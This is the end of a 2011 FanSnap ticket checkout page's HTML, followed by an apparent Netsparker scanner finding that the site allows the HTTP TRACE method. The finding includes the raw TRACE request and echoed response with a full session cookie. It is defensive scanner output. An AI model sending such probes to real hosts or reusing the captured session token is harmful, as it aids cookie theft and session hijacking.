class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-87-175', bld: 'REL-fansnap-1.20.2-r31787', vstId: -181883062, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-181883062%3A1342566973901825%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100561%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fcheckout%252Findex%252F418563179%253Fctx%253Dc%25253Dtix%25253Bmt%25253Dint%25253Btsp%25253D0%25253Bdt%25253D1%25253Blpos%25253D2%2526ch%253Dbing%2526quantity%253D2%2526lp%253Dtrue%2526poctx%253Drank%25253D36%25253BcrawlScore%25253Dnull%25253Bpop1%25253D0.0374%25253Bpop2%25253D0.0374%25253Bpop3%25253D0.0374%25253B%2526afm%253D%2526uet%253D-776896836%25253A7925%25253Apgstickets%25257C%25257Cbing%25257Cmt%25253Aint%25253Bsz%25253A1254%25253Bid%25253A389669' width='1' /></body></html>
TRACE / TRACK Identified

TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Request

TRACE /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=256; tvid=1342566973901825; _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOhF0bXBfdmlzaXRfaWRp%2FEqvKPU6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVACzoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4C9LweQBjoLb2Zmc2V0af6QnQ%3D%3D--d7b84757319ac1bb83921f8244de960874aa10b5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:36:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http


TRACE /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: bg_ver=1; bg_vid=256; tvid=1342566973901825; _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOhF0bXBfdmlzaXRfaWRp%2FEqvKPU6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVACzoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4C9LweQBjoLb2Zmc2V0af6QnQ%3D%3D--d7b84757319ac1bb83921f8244de960874aa10b5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243